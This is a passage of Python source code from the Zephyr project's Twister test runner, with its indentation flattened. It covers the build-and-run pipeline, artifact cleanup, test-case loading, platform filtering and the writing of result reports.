results.skipped_runtime += 1
for case in self.instance.testcase.cases:
self.instance.results.update({case: 'SKIP'})
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
res = self.build()
if not res:
self.instance.status = "error"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
# Count skipped cases during build, for example
# due to ram/rom overflow.
inst = res.get("instance", None)
if inst and inst.status == "skipped":
results.skipped_runtime += 1
if res.get('returncode', 1) > 0:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.run and self.instance.handler:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
self.instance.status, _ = self.instance.handler.get_state()
logger.debug(f"run status: {self.instance.name} {self.instance.status}")
# to make it work with pickle
self.instance.handler.thread = None
self.instance.handler.suite = None
pipeline.put({
"op": "report",
"test": self.instance,
"status": self.instance.status,
"reason": self.instance.reason
}
)
# Report results and output progress to screen
elif op == "report":
with lock:
done.put(self.instance)
self.report_out(results)
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
if self.device_testing:
self.cleanup_device_testing_artifacts()
else:
self.cleanup_artifacts()
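# A sketch of the op flow handled by process() above:
#   "cmake"  -> "report" on error, filter match or in cmake-only mode, else "build"
#   "build"  -> "report" on failure/overflow, else "run" when the instance is
#               runnable and has a handler, else "report"
#   "run"    -> "report"
#   "report" -> "cleanup" when cleanup was requested, coverage is off and the
#               instance passed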
def cleanup_artifacts(self, additional_keep=[]):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
allow = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
allow += additional_keep
allow = [os.path.join(self.instance.build_dir, file) for file in allow]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in allow:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def cleanup_device_testing_artifacts(self):
logger.debug("Cleaning up for Device Testing {}".format(self.instance.build_dir))
sanitizelist = [
'CMakeCache.txt',
'zephyr/runners.yaml',
]
keep = [
'zephyr/zephyr.hex',
'zephyr/zephyr.bin',
'zephyr/zephyr.elf',
]
keep += sanitizelist
self.cleanup_artifacts(keep)
# sanitize paths so files are relocatable
for file in sanitizelist:
file = os.path.join(self.instance.build_dir, file)
with open(file, "rt") as fin:
data = fin.read()
data = data.replace(canonical_zephyr_base+"/", "")
with open(file, "wt") as fin:
fin.write(data)
def report_out(self, results):
total_to_do = results.total - results.skipped_configs
total_tests_width = len(str(total_to_do))
results.done += 1
instance = self.instance
if instance.status in ["error", "failed", "timeout"]:
if instance.status == "error":
results.error += 1
results.failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testcase.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status == "skipped":
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
elif instance.status == "passed":
status = Fore.GREEN + "PASSED" + Fore.RESET
else:
logger.debug(f"Unknown status = {instance.status}")
status = Fore.YELLOW + "UNKNOWN" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status == "skipped":
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.handler.duration
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
results.done, total_tests_width, total_to_do, instance.platform.name,
instance.testcase.name, status, more_info))
if instance.status in ["error", "failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
completed_perc = 0
if total_to_do > 0:
completed_perc = int((float(results.done) / total_to_do) * 100)
skipped = results.skipped_configs + results.skipped_runtime
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
results.done,
total_to_do,
Fore.RESET,
completed_perc,
Fore.YELLOW if skipped > 0 else Fore.RESET,
skipped,
Fore.RESET,
Fore.RED if results.failed > 0 else Fore.RESET,
results.failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testcase.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if os.path.exists(os.path.join(instance.build_dir,
"twister", "testcase_extra.conf")):
overlays.append(os.path.join(instance.build_dir,
"twister", "testcase_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
res = self.run_cmake(args)
return res
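# A hypothetical illustration of the overlay merge above: starting from
# args = ["OVERLAY_CONFIG=a.conf", "CONF_FILE=prj.conf"] and an existing
# twister/testcase_extra.conf, run_cmake() would be invoked with
#   ["CONF_FILE=prj.conf",
#    'OVERLAY_CONFIG="a.conf <build_dir>/twister/testcase_extra.conf"']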
def build(self):
res = self.run_build(['--build', self.build_dir])
return res
def run(self):
instance = self.instance
if instance.handler:
if instance.handler.type_str == "device":
instance.handler.suite = self.suite
instance.handler.handle()
sys.stdout.flush()
class TestSuite(DisablePyTestCollectionMixin):
config_re = re.compile(r'(CONFIG_[A-Za-z0-9_]+)[=]"?([^"]*)"?$')
dt_re = re.compile(r'([A-Za-z0-9_]+)[=]"?([^"]*)"?$')
tc_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "testcase-schema.yaml"))
testcase_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_allow": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"integration_platforms": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_allow": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_allow": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}}
}
RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "release",
"twister_last_release.csv")
SAMPLE_FILENAME = 'sample.yaml'
TESTCASE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testcase_roots=[], outdir=None):
self.roots = testcase_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Testsuite Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_ubsan = False
self.enable_lsan = False
self.enable_asan = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_size_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
self.warnings_as_errors = True
self.overflow_as_errors = False
# Keep track of which test cases we've filtered out and why
self.testcases = {}
self.platforms = []
self.selected_platforms = []
self.filtered_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
# hardcoded for now
self.duts = []
# run integration tests only
self.integration = False
self.pipeline = None
self.version = "NA"
def check_zephyr_version(self):
try:
subproc = subprocess.run(["git", "describe", "--abbrev=12"],
stdout=subprocess.PIPE,
universal_newlines=True,
cwd=ZEPHYR_BASE)
if subproc.returncode == 0:
self.version = subproc.stdout.strip()
logger.info(f"Zephyr version: {self.version}")
except OSError:
logger.info("Cannot read zephyr version.")
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + "/")}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update_counting(self, results=None, initial=False):
results.skipped_configs = 0
results.skipped_cases = 0
for instance in self.instances.values():
if initial:
results.cases += len(instance.testcase.cases)
if instance.status == 'skipped':
results.skipped_configs += 1
results.skipped_cases += len(instance.testcase.cases)
elif instance.status == "passed":
results.passed += 1
for res in instance.results.values():
if res == 'SKIP':
results.skipped_cases += 1
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.error("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
cr = csv.DictReader(fp)
for row in cr:
d = {}
for m, _, _ in interesting_metrics:
d[m] = row[m]
saved_metrics[(row["test"], row["platform"])] = d
for instance in self.instances.values():
mkey = (instance.testcase.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def footprint_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
logger.debug("running footprint_reports")
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = 0
if value > delta:
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage < (footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testcase.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, results, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
if instance.metrics.get('handler_time', None):
run += 1
if results.total and results.total != results.skipped_configs:
pass_rate = (float(results.passed) / float(results.total - results.skipped_configs))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} test configurations passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
results.passed,
results.total - results.skipped_configs,
Fore.RESET,
pass_rate,
Fore.RED if results.failed else Fore.RESET,
results.failed,
Fore.RESET,
results.skipped_configs,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
# if we are only building, do not report about tests being executed.
if self.platforms and not self.build_only:
logger.info("In total {} test cases were executed, {} skipped on {} out of total {} platforms ({:02.2f}%)".format(
results.cases - results.skipped_cases,
results.skipped_cases,
len(self.filtered_platforms),
self.total_platforms,
(100 * len(self.filtered_platforms) / len(self.platforms))
))
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} test configurations executed on platforms, \
{Fore.RED}{results.total - run - results.skipped_configs}{Fore.RESET} test configurations were only built.")
def save_reports(self, name, suffix, report_dir, no_update, release, only_failed, platform_reports, json_report):
if not self.instances:
return
logger.info("Saving reports...")
if name:
report_name = name
else:
report_name = "twister"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
self.xunit_report(filename + ".xml", full_report=False,
append=only_failed, version=self.version)
self.xunit_report(filename + "_report.xml", full_report=True,
append=only_failed, version=self.version)
self.csv_report(filename + ".csv")
if json_report:
self.json_report(filename + ".json", append=only_failed, version=self.version)
if platform_reports:
self.target_report(outdir, suffix, append=only_failed)
if self.discards:
self.discard_report(filename + "_discard.csv")
if release:
self.csv_report(self.RELEASE_DATA)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
try:
platform = Platform()
platform.load(file)
if platform.name in [p.name for p in self.platforms]:
logger.error(f"Duplicate platform {platform.name} in {file}")
raise Exception(f"Duplicate platform identifier {platform.name} found")
if platform.twister:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
def get_all_tests(self):
tests = []
for _, tc in self.testcases.items():
for case in tc.cases:
tests.append(case)
return tests
@staticmethod
def get_toolchain():
toolchain_script = Path(ZEPHYR_BASE) / Path('cmake/verify-toolchain.cmake')
result = CMake.run_cmake_script([toolchain_script, "FORMAT=json"])
try:
if result['returncode']:
raise TwisterRuntimeError("E: Variable ZEPHYR_TOOLCHAIN_VARIANT is not defined")
except Exception as e:
print(str(e))
sys.exit(2)
toolchain = json.loads(result['stdout'])['ZEPHYR_TOOLCHAIN_VARIANT']
logger.info(f"Using '{toolchain}' toolchain.")
return toolchain
def add_testcases(self, testcase_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, dirnames, filenames in os.walk(root, topdown=True):
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTCASE_FILENAME in filenames:
filename = self.TESTCASE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
dirnames[:] = []
tc_path = os.path.join(dirpath, filename)
try:
parsed_data = TwisterConfigParser(tc_path, self.tc_schema)
parsed_data.load()
tc_path = os.path.dirname(tc_path)
workdir = os.path.relpath(tc_path, root)
for name in parsed_data.tests.keys():
tc = TestCase(root, workdir, name)
tc_dict = parsed_data.get_test(name, self.testcase_valid_keys)
tc.source_dir = tc_path
tc.yamlfile = tc_path
tc.type = tc_dict["type"]
tc.tags = tc_dict["tags"]
tc.extra_args = tc_dict["extra_args"]
tc.extra_configs = tc_dict["extra_configs"]
tc.arch_allow = tc_dict["arch_allow"]
tc.arch_exclude = tc_dict["arch_exclude"]
tc.skip = tc_dict["skip"]
tc.platform_exclude = tc_dict["platform_exclude"]
tc.platform_allow = tc_dict["platform_allow"]
tc.toolchain_exclude = tc_dict["toolchain_exclude"]
tc.toolchain_allow = tc_dict["toolchain_allow"]
tc.tc_filter = tc_dict["filter"]
tc.timeout = tc_dict["timeout"]
tc.harness = tc_dict["harness"]
tc.harness_config = tc_dict["harness_config"]
if tc.harness == 'console' and not tc.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
tc.build_only = tc_dict["build_only"]
tc.build_on_all = tc_dict["build_on_all"]
tc.slow = tc_dict["slow"]
tc.min_ram = tc_dict["min_ram"]
tc.depends_on = tc_dict["depends_on"]
tc.min_flash = tc_dict["min_flash"]
tc.extra_sections = tc_dict["extra_sections"]
tc.integration_platforms = tc_dict["integration_platforms"]
tc.parse_subcases(tc_path)
if testcase_filter:
if tc.name and tc.name in testcase_filter:
self.testcases[tc.name] = tc
else:
self.testcases[tc.name] = tc
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (tc_path, e))
self.load_errors += 1
return len(self.testcases)
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_from_file(self, file, filter_status=[], filter_platform=[]):
try:
with open(file, "r") as fp:
cr = csv.DictReader(fp)
instance_list = []
for row in cr:
if row["status"] in filter_status:
continue
test = row["test"]
platform = self.get_platform(row["platform"])
if filter_platform and platform.name not in filter_platform:
continue
instance = TestInstance(self.testcases[test], platform, self.outdir)
if self.device_testing:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
instance.create_overlay(platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
except KeyError as e:
logger.error("Key error while parsing tests file.({})".format(str(e)))
sys.exit(2)
except FileNotFoundError as e:
logger.error("Couldn't find input file with list of tests. ({})".format(e))
sys.exit(2)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testcase_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
runnable = kwargs.get('runnable')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
emu_filter = kwargs.get('emulation_only')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
emulation_platforms = False
if all_filter:
logger.info("Selecting all possible platforms per test case")
# When --all is used, any --platform arguments are ignored
platform_filter = []
elif not platform_filter and not emu_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
elif emu_filter:
logger.info("Selecting emulation platforms per test case")
emulation_platforms = True
if platform_filter:
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
elif emu_filter:
platforms = list(filter(lambda p: p.simulation != 'na', self.platforms))
elif arch_filter:
platforms = list(filter(lambda p: p.arch in arch_filter, self.platforms))
elif default_platforms:
platforms = list(filter(lambda p: p.default, self.platforms))
else:
platforms = self.platforms
logger.info("Building initial testcase list...")
for tc_name, tc in self.testcases.items():
if tc.build_on_all and not platform_filter:
platform_scope = self.platforms
elif tc.integration_platforms and self.integration:
platform_scope = list(filter(lambda item: item.name in tc.integration_platforms, \
self.platforms))
else:
platform_scope = platforms
# list of instances per testcase, aka configurations.
instance_list = []
for plat in platform_scope:
instance = TestInstance(tc, plat, self.outdir)
if runnable:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
for t in tc.cases:
instance.results[t] = None
if runnable and self.duts:
for h in self.duts:
if h.platform == plat.name:
if tc.harness_config.get('fixture') in h.fixtures:
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = discards.get(instance, "Platform is excluded on command line.")
if (plat.arch == "unit") != (tc.type == "unit"):
# Discard silently
continue
if runnable and not instance.run:
discards[instance] = discards.get(instance, "Not runnable on device")
if self.integration and tc.integration_platforms and plat.name not in tc.integration_platforms:
discards[instance] = discards.get(instance, "Not part of integration platforms")
if tc.skip:
discards[instance] = discards.get(instance, "Skip filter")
if tag_filter and not tc.tags.intersection(tag_filter):
discards[instance] = discards.get(instance, "Command line testcase tag filter")
if exclude_tag and tc.tags.intersection(exclude_tag):
discards[instance] = discards.get(instance, "Command line testcase exclude filter")
if testcase_filter and tc_name not in testcase_filter:
discards[instance] = discards.get(instance, "Testcase name filter")
if arch_filter and plat.arch not in arch_filter:
discards[instance] = discards.get(instance, "Command line testcase arch filter")
if not force_platform:
if tc.arch_allow and plat.arch not in tc.arch_allow:
discards[instance] = discards.get(instance, "Not in test case arch allow list")
if tc.arch_exclude and plat.arch in tc.arch_exclude:
discards[instance] = discards.get(instance, "In test case arch exclude")
if tc.platform_exclude and plat.name in tc.platform_exclude:
discards[instance] = discards.get(instance, "In test case platform exclude")
if tc.toolchain_exclude and toolchain in tc.toolchain_exclude:
discards[instance] = discards.get(instance, "In test case toolchain exclude")
if platform_filter and plat.name not in platform_filter:
discards[instance] = discards.get(instance, "Command line platform filter")
if tc.platform_allow and plat.name not in tc.platform_allow:
discards[instance] = discards.get(instance, "Not in testcase platform allow list")
if tc.toolchain_allow and toolchain not in tc.toolchain_allow:
discards[instance] = discards.get(instance, "Not in testcase toolchain allow list")
if not plat.env_satisfied:
discards[instance] = discards.get(instance, "Environment ({}) not satisfied".format(", ".join(plat.env)))
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and tc.type != 'unit':
discards[instance] = discards.get(instance, "Not supported by the toolchain")
if plat.ram < tc.min_ram:
discards[instance] = discards.get(instance, "Not enough RAM")
if tc.depends_on:
dep_intersection = tc.depends_on.intersection(set(plat.supported))
if dep_intersection != set(tc.depends_on):
discards[instance] = discards.get(instance, "No hardware support")
if plat.flash < tc.min_flash:
discards[instance] = discards.get(instance, "Not enough FLASH")
if set(plat.ignore_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (exclude_tags)")
if plat.only_tags and not set(plat.only_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (only_tags)")
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testcase
if not instance_list:
continue
integration = self.integration and tc.integration_platforms
# if twister was launched with no platform options at all, we
# take all default platforms
if default_platforms and not tc.build_on_all and not integration:
if tc.platform_allow:
a = set(self.default_platforms)
b = set(tc.platform_allow)
c = a.intersection(b)
if c:
aa = list(filter(lambda inst: inst.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list[:1])
else:
instances = list(filter(lambda inst: inst.platform.default, instance_list))
self.add_instances(instances)
elif integration:
instances = list(filter(lambda item: item.platform.name in tc.integration_platforms, instance_list))
self.add_instances(instances)
elif emulation_platforms:
self.add_instances(instance_list)
for instance in list(filter(lambda inst: inst.platform.simulation == 'na', instance_list)):
discards[instance] = discards.get(instance, "Not an emulated platform")
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
for instance in self.discards:
instance.reason = self.discards[instance]
instance.status = "skipped"
instance.fill_results_by_status()
self.filtered_platforms = set(p.platform.name for p in self.instances.values()
if p.status != "skipped" )
return discards
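# A hypothetical walk-through of the bookkeeping above: an instance that is
# both excluded on the command line and short on RAM keeps only the first
# recorded reason ("Platform is excluded on command line."); every discarded
# instance is then marked "skipped" and its per-case results are filled in
# via fill_results_by_status().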
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
@staticmethod
def calc_one_elf_size(instance):
if instance.status not in ["error", "failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
def add_tasks_to_queue(self, pipeline, build_only=False, test_only=False):
for instance in self.instances.values():
if build_only:
instance.run = False
if test_only and instance.run:
pipeline.put({"op": "run", "test": instance})
else:
if instance.status not in ['passed', 'skipped', 'error']:
logger.debug(f"adding {instance.name}")
instance.status = None
pipeline.put({"op": "cmake", "test": instance})
def pipeline_mgr(self, pipeline, done_queue, lock, results):
while True:
try:
task = pipeline.get_nowait()
except queue.Empty:
break
else:
test = task['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
ubsan=self.enable_ubsan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose,
warnings_as_errors=self.warnings_as_errors,
overflow_as_errors=self.overflow_as_errors
)
pb.process(pipeline, done_queue, task, lock, results)
return True
def execute(self, pipeline, done, results):
lock = Lock()
logger.info("Adding tasks to the queue...")
self.add_tasks_to_queue(pipeline, self.build_only, self.test_only)
logger.info("Added initial list of jobs to queue")
processes = []
for job in range(self.jobs):
logger.debug(f"Launch process {job}")
p = Process(target=self.pipeline_mgr, args=(pipeline, done, lock, results, ))
processes.append(p)
p.start()
try:
for p in processes:
p.join()
except KeyboardInterrupt:
logger.info("Execution interrupted")
for p in processes:
p.terminate()
# FIXME: This needs to move out.
if self.enable_size_report and not self.cmake_only:
# Parallelize size calculation
executor = concurrent.futures.ThreadPoolExecutor(self.jobs)
futures = [executor.submit(self.calc_one_elf_size, instance)
for instance in self.instances.values()]
concurrent.futures.wait(futures)
else:
for instance in self.instances.values():
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
instance.metrics["unrecognized"] = []
return results
def discard_report(self, filename):
try:
if not self.discards:
raise TwisterRuntimeError("apply_filters() hasn't been run!")
except Exception as e:
logger.error(str(e))
sys.exit(2)
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "reason"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance, reason in sorted(self.discards.items()):
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"reason": reason}
cw.writerow(rowdict)
def target_report(self, outdir, suffix, append=False):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(filename, platform, full_report=True,
append=append, version=self.version)
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
def xunit_report(self, filename, platform=None, full_report=False, append=False, version="NA"):
total = 0
fails = passes = errors = skips = 0
if platform:
selected = [platform]
logger.info(f"Writing target report for {platform}...")
else:
logger.info(f"Writing xunit report {filename}...")
selected = self.selected_platforms
if os.path.exists(filename) and append:
tree = ET.parse(filename)
eleTestsuites = tree.getroot()
else:
eleTestsuites = ET.Element('testsuites')
for p in selected:
inst = self.get_platform_instances(p)
fails = 0
passes = 0
errors = 0
skips = 0
duration = 0
for _, instance in inst.items():
handler_time = instance.metrics.get('handler_time', 0)
duration += handler_time
if full_report and instance.run:
for k in instance.results.keys():
if instance.results[k] == 'PASS':
passes += 1
elif instance.results[k] == 'BLOCK':
errors += 1
elif instance.results[k] == 'SKIP' or instance.status in ['skipped']:
skips += 1
else:
fails += 1
else:
if instance.status in ["error", "failed", "timeout"]:
if instance.reason in ['build_error', 'handler_crash']:
errors += 1
else:
fails += 1
elif instance.status == 'skipped':
skips += 1
elif instance.status == 'passed':
passes += 1
else:
if instance.status:
logger.error(f"{instance.name}: Unknown status {instance.status}")
else:
logger.error(f"{instance.name}: No status")
total = (errors + passes + fails + skips)
# do not produce a report if no tests were actually run (only built)
if total == 0:
continue
run = p
eleTestsuite = None
# When we re-run the tests, we re-use the results and update only with
# the newly run tests.
if os.path.exists(filename) and append:
ts = eleTestsuites.findall(f'testsuite/[@name="{p}"]')
if ts:
eleTestsuite = ts[0]
eleTestsuite.attrib['failures'] = "%d" % fails
eleTestsuite.attrib['errors'] = "%d" % errors
eleTestsuite.attrib['skipped'] = "%d" % skips
else:
logger.info(f"Did not find any existing results for {p}")
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
eleTSProperties = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSProperties, 'property', name="version", value=version)
else:
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
eleTSProperties = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSProperties, 'property', name="version", value=version)
for _, instance in inst.items():
if full_report:
tname = os.path.basename(instance.testcase.name)
else:
tname = instance.testcase.id
handler_time = instance.metrics.get('handler_time', 0)
if full_report:
for k in instance.results.keys():
                        # remove testcases that are being re-run from existing reports
for tc in eleTestsuite.findall(f'testcase/[@name="{k}"]'):
eleTestsuite.remove(tc)
classname = ".".join(tname.split(".")[:2])
eleTestcase = ET.SubElement(
eleTestsuite, 'testcase',
classname=classname,
name="%s" % (k), time="%f" % handler_time)
if instance.results[k] in ['FAIL', 'BLOCK'] or \
(not instance.run and instance.status in ["error", "failed", "timeout"]):
if instance.results[k] == 'FAIL':
el = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message="failed")
else:
el = ET.SubElement(
eleTestcase,
'error',
type="failure",
message="failed")
log_root = os.path.join(self.outdir, instance.platform.name, instance.testcase.name)
